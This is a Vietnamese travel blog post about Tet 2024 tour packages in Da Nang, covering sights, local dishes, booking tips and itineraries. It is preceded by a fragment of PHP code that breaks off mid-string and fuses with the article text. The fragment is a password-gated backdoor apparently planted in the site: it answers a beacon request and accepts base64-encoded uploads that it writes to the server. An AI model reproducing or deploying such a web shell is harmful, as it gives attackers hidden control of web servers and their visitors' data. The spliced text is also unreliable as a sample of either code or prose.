function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Bí quyết đi tour du lịch Đà Nẵng Tết 2024 ưu đãi ngập tràn

Bí quyết đi tour du lịch Đà Nẵng Tết 2024 ưu đãi ngập tràn

16/01/2023 Đi Để Đến - Group

Đi tour du lịch Đà Nẵng Tết 2024 là lựa chọn của không ít các tín đồ đam mê du lịch dịp Tết này. Đà Nẵng – thành phố đáng sống nhất tại Việt Nam hứa hẹn sẽ là điểm đến du lịch đem lại những phút giây trải nghiệm đáng nhớ dành cho du khách và gia đình vào dịp Tết Nguyên Đán.

Du lịch Đà Nẵng Tết 2024 theo tour đi đâu, ăn gì chắc hẳn đang là mối băn khoăn của nhiều du khách trong những ngày tết đang cận kề. Hãy cùng dideden.com khám phá bí kíp đi tour du lịch Đà Nẵng Tết 2024 siêu hấp dẫn với tất tần tật kinh nghiệm từ lịch trình đi tour, các địa điểm tham quan, các món ăn ngon và một số lưu ý quan trọng dành cho du khách. 

NHỮNG ĐỊA ĐIỂM THAM QUAN HẤP DẪN TRONG TOUR DU LỊCH ĐÀ NẴNG DỊP TẾT 2024

Thời tiết Đà Nẵng vào những ngày Tết vô cùng dễ chịu, ít mưa phù hợp để du khách có thể thỏa sức tham quan, khám phá các điểm đến du lịch. Vì vậy, Đi Để Đến xin được giới thiệu đến bạn một số địa điểm tham quan nổi tiếng trong tour du lịch Đà Nẵng Tết 2024 giúp bạn có chuyến trải nghiệm tại thành phố nhộn nhịp này trọn vẹn nhất. 

1. Đường hoa Bạch Đằng

Đi tour du lịch Đà Nẵng Tết 2024, du khách sẽ vô cùng thích thú khi ghé qua đường hoa Bạch Đằng và chiêm ngưỡng vẻ đẹp của những sắc hoa rực rỡ đầu xuân. Đường hoa Bạch Đằng tọa lạc tại ven sông Hàn nên du khách có thể dễ dàng đi bộ đến đây để ngắm nhìn vẻ đẹp của đường hoa một cách chân thực nhất. 

Mỗi dịp Tết đến, vườn hoa Bạch Đằng như thay màu áo mới với muôn loài hoa khoe sắc. Vẻ đẹp từ những bông hoa đa sắc màu sẽ giúp du khách cảm nhận rõ hơn không khí của mùa xuân Đà Thành. Sức sống căng tràn từ hoa lá đem lại cảm giác tươi vui dịp đầu năm mới. 

tour du lich Da Nang Tet 2023 - cho hoa

Chiêm ngưỡng vẻ đẹp của đường hoa xuân tại Đà Nẵng. Nguồn sưu tầm

2. Chợ hoa đường 2/9

Ghé thăm Đà Nẵng vào dịp tết này, du khách sẽ được du xuân giữa chợ hoa đầy sôi động tại quảng trường 2/9. Chợ hoa đường 2/9 là chợ hoa Tết lớn nhất tại thành phố Đà Nẵng mỗi dịp tết đến. 

Trong những ngày tết cận kề, người dân thường tới đây để xem hoa và mua hoa. Vậy nên khi đi tour du lịch Đà Nẵng Tết 2024, du khách có thể ghé qua chợ hoa đường 2/9 để ngắm nhìn những cành đào, cành mai, cúc vàng, quất được bày bán khắp nơi trong khu vực quảng trường. 

>>> Xem thêm: Combo du lịch Đà Nẵng giá rẻ cực chất để vi vu trọn năm 2024

3. Chùa Linh Ứng

Đi tour du lịch Đà Nẵng Tết 2024 phần lớn du khách đều mong muốn ghé qua các ngôi chùa linh thiêng để cầu may mắn và bình an đầu năm. Vì thế, du khách hãy ghé qua một trong 3 ngôi chùa Linh Ứng nổi tiếng tại Đà Nẵng để hành hương và chiêm ngưỡng phong cảnh thiên nhiên tuyệt đẹp của thành phố từ trên cao. 

Chùa Linh Ứng Đà Nẵng là điểm đến tâm linh nổi tiếng với lối kiến trúc độc đáo làm nên điểm nổi bật cho ngôi chùa này. Khung cảnh xung quanh chùa Linh Ứng được ví như một bức tranh hài hòa giữa vẻ đẹp linh thiêng của chùa chiền và sức hấp dẫn của thiên nhiên, đất trời. 

tour du lich Da Nang Tet 2023 - chua Linh Ung

Tượng phật linh thiêng tại chùa Linh Ứng. Nguồn sưu tầm

4. Bãi biển Mỹ Khê

Bãi biển Mỹ Khê nằm tại tuyến đường Võ Nguyên Giáp trong thành phố Đà Nẵng, là điểm đến lý tưởng mà bạn không nên bỏ qua khi đi tour du lịch Đà Nẵng Tết 2024. Bãi biển Mỹ Khê sở hữu bãi cát trắng mịn trải dài, nước biển trong xanh cùng các dịch vụ du lịch rất phát triển nên thu hút đông đảo khách du lịch đến nghỉ dưỡng hàng năm. 

Ngoài ra, các địa điểm lưu trú tại khu vực quanh bãi biển Mỹ Khê vô cùng sang trọng và cao cấp. Du khách tới đây có rất nhiều lựa chọn về khách sạn, khu biệt thự,… do đó thời gian qua du lịch tại bãi biển Mỹ Khê Đà Nẵng được rất nhiều khách du lịch trong nước và quốc tế vô cùng yêu thích. 

tour du lich Da Nang Tet 2023 - bai bien My Khe

Du khách vui chơi, tắm biển trên biển Mỹ Khê. Nguồn sưu tầm

5. Chợ đêm Helio

Nếu bạn đang thắc mắc đi tour du lịch Đà Nẵng Tết 2024 chơi gì vào buổi tối thì hãy ghé qua chợ đêm Helio để hòa mình với cuộc sống về đêm nhộn nhịp của người dân nơi đây. Chợ đêm Helio hoạt động trong suốt các dịp lễ lớn, các ngày Tết và đêm giao thừa. Vì vậy, du khách có thể đến đây vui chơi, ăn uống, xem ca nhạc và đón năm mới cùng gia đình và bạn bè tại khu chợ sầm uất bậc nhất Đà Nẵng. 

>>> Xem thêm: Combo du lịch Đà Nẵng 3 ngày 2 đêm làm du khách “điên đảo”

6. Cầu Rồng

Thưởng thức những màn pháo hoa đặc sắc của Đà Nẵng từ Cầu Rồng sẽ là một trải nghiệm thú vị dành cho du khách đi tour du lịch Đà Nẵng Tết 2024. Cầu Rồng từ lâu đã được xem là một trong những biểu tượng độc đáo của thành phố du lịch Đà Nẵng. Không chỉ đóng vai trò là cầu nối giao thông huyết mạch của thành phố, cầu Rồng còn mang vẻ đẹp nghệ thuật kiến trúc mang nét đẹp hiện đại và truyền thống của Việt Nam. 

tour du lich Da Nang Tet 2023 - cau Rong

Cầu Rồng trở thành điểm check in yêu thích của các bạn trẻ. Nguồn sưu tầm

Mỗi dịp Tết đến, du khách sẽ có cơ hội được chiêm ngưỡng những màn biểu diễn phun lửa và nước từ đầu rồng. Tận hưởng khoảnh khắc tuyệt diệu này trong giờ phút chuyển giao năm cũ sang năm mới chắc chắn sẽ là trải nghiệm du lịch đáng nhớ với du khách dịp tết này. 

7. Bán đảo Sơn Trà

Khám phá bản đồ du lịch thành phố Đà Nẵng dịp tết chắc chắn không thể bỏ qua bán đảo Sơn Trà. Du lịch bán đảo Sơn Trà hứa hẹn sẽ đem lại những điều thú vị và bất ngờ trong chuyến hành trình của du khách. 

Bán đảo Sơn Trà Đà Nẵng hấp dẫn du khách bởi những địa điểm tham quan du lịch nổi tiếng cùng với lợi thế về thời tiết. Tới bán đảo Sơn Trà, du khách có thể trải nghiệm tắm biển tại những bãi tắm vô cùng xinh đẹp như Bãi Bụt, Bãi Đá đen, Bãi Nam, Bãi Bắc,… 

Ngoài ra, tại bán đảo Sơn Trà, du khách có thể check-in sống ảo tại Đỉnh Bàn Cờ, Cảng Tiên Sa,… Từ các địa điểm này, du khách có thể chiêm ngưỡng toàn cảnh vẻ đẹp của thành phố Đà Nẵng nhộn nhịp và sầm uất phía xa. 

8. Ngũ Hành Sơn

Ngũ Hành Sơn là điểm đến tiếp theo mà Đi Để Đến muốn giới thiệu tới bạn trong tour du lịch Đà Nẵng Tết 2024. Ngũ Hành Sơn nổi tiếng với thắng cảnh tuyệt đẹp, được du khách vô cùng yêu mến trong hành trình tham quan các di sản văn hóa tại miền Trung.

tour du lich Da Nang Tet 2023 - Ngu Hanh Son

Vẻ đẹp thiên nhiên kỳ bí trong hang động của Ngũ Hành Sơn. Nguồn sưu tầm

Tới Ngũ Hành Sơn, du khách sẽ có cơ hội được khám phá 6 ngọn núi đá vôi Kim Sơn, Thủy Sơn, Mộc Sơn, Hỏa Sơn, Thổ Sơn cùng các hang động. Bên cạnh đó, ghé thăm Ngũ Hành Sơn dịp Tết, du khách có thể check-in tại bãi biển Non Nước, hòa mình vào làn nước trong xanh, ngắm nhìn mây trời sau hành trình khám phá, chinh phục núi rừng. 

>>> Xem thêm: Chơi thả ga với combo du lịch Đà Nẵng 4 ngày 3 đêm

KHÁM PHÁ THIÊN ĐƯỜNG ẨM THỰC TRONG TOUR DU LỊCH ĐÀ NẴNG TẾT 2024

Đà Nẵng không chỉ nổi tiếng với các điểm đến du lịch với phong cảnh tuyệt đẹp mà còn là thiên đường ẩm thực đối với các tín đồ du lịch. Du lịch Đà Nẵng dịp Tết, du khách nên thưởng thức một số món ăn đặc sản nổi tiếng như bánh tráng cuốn thịt heo, mì Quảng Đà Nẵng, gỏi cá Nam Ô,… 

Ngoài ra, thành phố du lịch biển Đà Nẵng còn hấp dẫn bởi các loại hải sản tươi ngon với giá thành rẻ. Trong chuyến đi tour du lịch Đà Nẵng Tết 2024, du khách hãy trải nghiệm hết các món ăn được gợi ý dưới đây và cho Đi Để Đến biết cảm nhận của bạn nhé.

1. Mì Quảng Đà Nẵng

Mì Quảng được biết đến là đặc sản dân dã, là một trong những biểu tượng của ẩm thực Đà thành. Đi tour Đà Nẵng Tết 2024, du khách có thể tìm thấy mì Quảng chuẩn vị tại bất kỳ đâu. Du khách có thể tìm đến các nhà hàng sang trọng hay những quán ăn vỉa hè để có thể thưởng thức món ăn thơm ngon này. 

tour du lich Da Nang Tet 2023 - mi Quang

Mỳ Quảng Đà Nẵng được bày trí đẹp mắt. Nguồn sưu tầm

Điểm đặc biệt của món ăn nằm ở hương vị của nước dùng đậm đà, ngọt từ xương. Các nguyên liệu làm mì Quảng cũng được lựa chọn và chế biến kỹ lưỡng. Tới Đà Nẵng, du khách có thể thưởng thức mì Quảng cá lóc, mì Quảng lươn đồng, mì Quảng gà,… Đây đều là những món ăn để lại ấn tượng sâu sắc với thực khách không chỉ bởi hương vị mà còn ở cách bày trí độc đáo. 

2. Bánh tráng cuốn thịt heo

Đi tour Đà Nẵng Tết 2024 mà không thưởng thức bánh tráng cuốn thịt heo của xứ Quảng thì thật là một thiếu sót lớn. Ẩm thực của Đà Nẵng có nét độc đáo riêng bởi mang linh hồn của người dân xứ Quảng. 

Bánh tráng cuốn thịt heo Đà Nẵng ghi dấu ấn riêng trong lòng du khách bởi những khác biệt ở phần bánh tráng được phơi sương, thịt heo được thái lát mỏng, rau củ quả đa dạng và nước mắm nêm được chế biến theo công thức riêng. Các nguyên liệu hòa quyện với nhau tạo nên tổng thể món ăn hoàn hảo, mang chất riêng của Đà Nẵng.  

>>> Xem thêm: 5+ Combo Hà Nội Đà Nẵng cho chuyến vi vu “độc lạ” năm 2024

3. Gỏi cá Nam Ô

Nếu có dịp đi tour Đà Nẵng Tết 2024 thời gian tới, du khách đừng quên thưởng thức món gỏi cá Nam Ô. Đây được xem là món ăn danh bất hư truyền có nguồn gốc từ một làng chài nhỏ, người dân kiếm sống chủ yếu bằng nghề đánh bắt. 

tour du lich Da Nang Tet 2023 - goi ca Nam O

Gỏi cá Nam Ô ngon trứ danh Đà thành. Nguồn sưu tầm

Sức hấp dẫn của gỏi cá Nam Ô đến từ những lát cá trích tươi ngon và được ướp với các loại gia vị đặc trưng. Gỏi cá Nam Ô được chia thành 2 loại là gỏi cá ướt và gỏi cá khô. Gỏi cá ướt dành cho người sành ăn, yêu thích vị tươi mát của thịt cá sống. Còn gỏi cá khô dành cho người e dè với món ăn sống. 

Để có được món gỏi cá Nam Ô thơm ngon không thể thiếu nước chấm. Nước chấm ăn kèm được chế biến từ các loại lá cây và ớt để làm tăng hương vị đậm đà cho gỏi cá. 

4. Bún chả cá

Bún chả cá là món ăn đặc sản miền Trung mà khi đi tour du lịch Đà Nẵng Tết 2024 du khách không thể bỏ qua. Cá tươi được chế biến thành chả ăn cùng với bún. Các loại cá như cá mối, cá chuồn, cá thác lác, cá thu,… được người dân chế biến thành chả.

Một tô bún chuẩn vị Đà Nẵng nằm ở phần nước dùng ngọt thanh nhưng có đột cay nhẹ. Nếu có dịp du lịch Đà Nẵng thời gian tới, hãy ghé qua quán ăn và thưởng thức món ăn này.

tour du lich Da Nang Tet 2023 - bun cha ca

Tô bún chả cá đầy đặn với các loại rau ăn kèm. Nguồn sưu tầm

5. Chè sầu

Chè sầu Đà Nẵng là một trong những món ăn tráng miệng đặc biệt mà Đi Để Đến muốn giới thiệu đến bạn trong tour du lịch Đà Nẵng Tết 2024. Chè sầu Đà Nẵng được làm từ nguyên liệu chính là trái sầu riêng nhưng người dân đã biến tấu đi một chút để món chè sầu mang nét riêng. 

Các thành phần khác được thêm vào trong món chè sầu Đà Nẵng là nước cốt dừa và sữa đặc. Vì vậy, chè sầu Đà Nẵng mang hương vị thơm béo độc đáo và có sự hài hòa. Du lịch Đà Nẵng còn gì tuyệt vời hơn khi được thưởng thức một ly chè sầu mát lạnh sau khi tham gia các hoạt động vui chơi giải trí ngoài trời. 

>>> Xem thêm: Gợi ý dịp Tết 2024 với combo Vinpearl Đà Nẵng

BÍ QUYẾT SĂN TOUR DU LỊCH ĐÀ NẴNG TẾT 2024 NGẬP TRÀN ƯU ĐÃI

Tour du lịch Đà Nẵng Tết 2024 đang là tour du lịch được nhiều du khách săn đón trong dịp Tết năm nay. Vậy lựa chọn tour thế nào với chi phí tiết kiệm và có nhiều ưu đãi luôn là băn khoăn của nhiều du khách. Dưới đây là một vài bí quyết giúp du khách săn được tour du lịch Đà Nẵng Tết 2024 giá rẻ nhưng vẫn thật trọn vẹn. 

1. Đặt tour càng sớm càng tốt

Trong những ngày Tết đang cận kề, nếu du khách đang có dự định đi du lịch cùng gia đình thì hãy nhanh chóng đặt tour càng sớm càng tốt. Điều này sẽ giúp du khách lựa chọn được tour du lịch phù hợp với mình. Bên cạnh đó, khi đặt tour sớm sẽ có chi phí rẻ hơn, tránh tình trạng bị hết chỗ trong tour. 

2. Lựa chọn công ty đặt tour uy tín

Lựa chọn công ty đặt tour uy tín là yếu tố vô cùng quan trọng khi du khách tìm kiếm tour du lịch Đà Nẵng Tết 2024 giá rẻ nhưng vẫn đảm bảo chất lượng. Du khách có thể tham khảo ý kiến của những người đã từng đặt tour trước đó hoặc tìm hiểu thông tin về các công ty lữ hành qua Internet. 

Nếu bạn còn băn khoăn về giá cả, dịch vụ của tour du lịch, bạn có thể gọi điện trực tiếp đến số tổng đài của công ty. Nhân viên sẽ hỗ trợ bạn giải đáp các thắc mắc về tour trước khi bạn lựa chọn được cho mình một tour du lịch phù hợp. Đi Để Đến xin được gợi ý đến bạn một số công ty du lịch uy tín như Vietnam Booking, Vietravel, Klook, halo travel,…

tour du lich Da Nang Tet 2023 - tour gia re

Săn tour ưu đãi tại Vietnam Booking. Nguồn sưu tầm

3. Thường xuyên cập nhật các voucher ưu đãi 

Mỗi dịp tết đến, các công ty lữ hành đều đưa ra các voucher giảm giá vô cùng ưu đãi. Du khách chỉ cần đăng ký thông tin cá nhân trên website công ty là đã có thể nhận được các voucher giá trị này. Khi sử dụng các mã khuyến mãi để đặt tour, bạn đã tiết kiệm được một khoản chi phí cho chuyến du lịch của mình. 

>>> Xem thêm: Tour Đà Nẵng Thái Lan 2024: Cẩm nang du lịch 4 ngày 3 đêm

4. Lựa chọn chương trình đi tour lý tưởng

Để lựa chọn được tour du lịch Đà Nẵng Tết 2024 phù hợp với gia đình bạn, bạn cần xem xét kỹ lưỡng về chương trình của chuyến đi. Việc lựa chọn điểm du lịch, phòng khách sạn sẽ rất quan trọng. Bạn có thể lựa chọn ở những khách sạn sang chảnh gần trung tâm nếu có nhiều chi phí cho du lịch hoặc ở homestay với chi phí vừa túi tiền nhưng dịch vụ vẫn rất chất lượng. 

Ngoài ra, hãy lựa chọn điểm đến du lịch thật ưng ý trong gói tour, điều này sẽ ảnh hưởng ít nhiều đến ấn tượng của bạn đối với điểm đến. Bạn có thể tham khảo lịch trình và mức giá tham khảo của tour du lịch Đà Nẵng Tết 2024 tại các trang thông tin của công ty du lịch. 

GỢI Ý CHƯƠNG TRÌNH MỘT SỐ TOUR DU LỊCH ĐÀ NẴNG TẾT 2024

Tour du lịch Đà Nẵng Tết 2024 với nhiều ưu đãi bất ngờ, lịch trình chi tiết sẽ được bật mí ngay sau đây. Du khách hãy lưu lại một vài gợi ý về chương trình một số tour du lịch Đà Nẵng Tết 2024 để đưa ra lựa chọn phù hợp với sở thích du lịch của gia đình mình bạn nhé!

1. Tour du lịch Tết 2024 Đà Nẵng – Hội An – Bà Nà – Huế 4 ngày 3 đêm

Ngày 1: Đà Nẵng – Bà Nà – Huế – Bán Đảo Sơn Trà – Sunwheel  

Ngày 2: Đà Nẵng – Ngũ Hành Sơn – phố cổ Hội An

Ngày 3: Bà Nà – Lăng Khải Định – cố đô Huế 

Ngày 4: Cố đô Huế – Hà Nội/thành phố Hồ Chí Minh

tour du lich Da Nang Tet 2023 - Ba Na Hills

Bà Nà Hills – điểm đến được nhiều bạn trẻ yêu thích. Nguồn sưu tầm

2. Tour Đà Nẵng – Hội An – Bà Nà – Núi Thần Tài 3 ngày 2 đêm

Ngày 1: Ngũ Hành Sơn – Hội An

Ngày 2: Vui chơi tại Bà Nà Hills ( Cầu Vàng, hầm rượu Debay, chùa Linh Ứng,…)

Ngày 3: Suối khoáng nóng núi Thần Tài – trở về Hà Nội/ thành phố Hồ Chí Minh

>>> Xem thêm: Thẫn thờ trước Combo 3 ngày 2 đêm Đà Nẵng đẹp như mơ

3. Tour Đà Nẵng – Hội An – Bà Nà Hills – Ngũ Hành Sơn 3 ngày 2 đêm

Ngày 1: Đà Nẵng – khám phá bán đảo Sơn Trà – Hội An

Ngày 2: Khám phá Bà Nà Hills, tham gia khu vui chơi giải trí trong nhà tại Bà Nà Hills

Ngày 3: Đà Nẵng – Ngũ Hành Sơn – trở về Hà Nội/ thành phố Hồ Chí Minh

4. Tour Đà Nẵng – Cù Lao Chàm – Bà Nà Hills 4 ngày 3 đêm

Ngày 1: Đà Nẵng – Bán Đảo Sơn Trà – Biển Mỹ Khê

Ngày 2: Đà Nẵng – Cù Lao Chàm – Phố cổ Hội An

Ngày 3: Bà Nà Hills – Bãi biển Mỹ Khê

Ngày 4: Chợ Hàn – Trở về Hà Nội/ thành phố Hồ Chí Minh

>>> Xem thêm: Combo Đà Nẵng 3 ngày 2 đêm dành cho tín đồ đam mê du lịch

Hy vọng sau khi đọc bài viết của dideden.com, các bạn đã lưu lại cho mình những thông tin hữu ích về kinh nghiệm đi tour du lịch Đà Nẵng Tết 2024 để chuẩn bị cho chuyến hành trình sắp tới. Nếu bạn còn băn khoăn thêm thông tin về tour du lịch Đà Nẵng Tết 2024 trọn gói thì hãy gọi ngay vào số hotline 1900 3398 để được hỗ trợ và tư vấn chi tiết nhé!

ĐĂNG KÍ ĐẶT TOUR DU LỊCH ĐÀ NẴNG

  • Tour Bình Châu 1 ngày tắm suối khoáng nóng siêu độc đáo
    Tour Bình Châu 1 ngày tắm suối khoáng nóng có đang được bạn quan tâm trong chuyến du lịch Vũng Tàu sắp tới? Chắc chắn nhiều người sẽ thắc mắc rằng đi Bình Châu thì nên tham gia những hoạt động gì, ăn gì, ở đâu? Bài viết sau đây của Đi Để Đến sẽ […]
  • Tour du lịch Vũng Tàu siêu hấp dẫn trong dịp cuối năm 2023
    Tour du lịch Vũng Tàu là lựa chọn phổ biến với những ai đang cần nạp “vitamin sea”. Vũng Tàu nổi tiếng là vùng biển yên bình, thú vị và tràn đầy sức sống. Vũng Tàu cách TP.HCM khoảng 110 km và tốn thời gian di chuyển khoảng 2 giờ. Nếu bạn đang có kế […]
  • Tất tần tật kinh nghiệm đi Tà Xùa chi tiết nhất 2023
    Tà Xùa được biết đến là thiên đường săn mây đẹp nhất ở vùng núi Tây Bắc. Theo kinh nghiệm đi Tà Xùa thì nơi đây là một trong những điểm đến được giới trẻ yêu thích nhất. Tà Xùa quanh năm được bao phủ bởi mây trắng bồng bềnh trên các đỉnh núi. Bạn […]
  • Đi Phú Quốc mùa nào đẹp? Top 10 địa điểm siêu hấp dẫn
    Đi Phú Quốc mùa nào đẹp chắc hẳn là câu hỏi mà rất nhiều người đang băn khoăn! “Đảo ngọc” Phú Quốc đang là một “thiên đường nghỉ dưỡng” được rất nhiều khách du lịch trong nước và nước ngoài săn đón. Nơi đây không chỉ thu hút du khách bởi những dãy núi non […]
  • Tour Singapore 5 ngày 4 đêm – Khám phá vẻ đẹp đảo quốc sư tử
    Singapore được biết đến là một đất nước hiện đại, năng động và phát triển. Nơi đây còn nổi tiếng với nhiều danh lam thắng cảnh và ẩm thực độc đáo. Lựa chọn tour Singapore 5 ngày 4 đêm sẽ mang đến cho bạn chuyến hành trình thú vị. Cùng Đi Để Đến khám phá […]
  • Du lịch Thái Lan đi đâu? Khám phá xứ sở chùa Vàng dịp hè 2023
    Bạn có biết du lịch Thái Lan đi đâu là thú vị nhất chưa? Những năm gần đây Thái Lan đang trở thành điểm du lịch hấp dẫn. Nơi đây còn nổi tiếng với nhiều điểm vui chơi thú vị, thu hút đông đảo du khách. Những bạn lần đầu đến Thái Lan sẽ không […]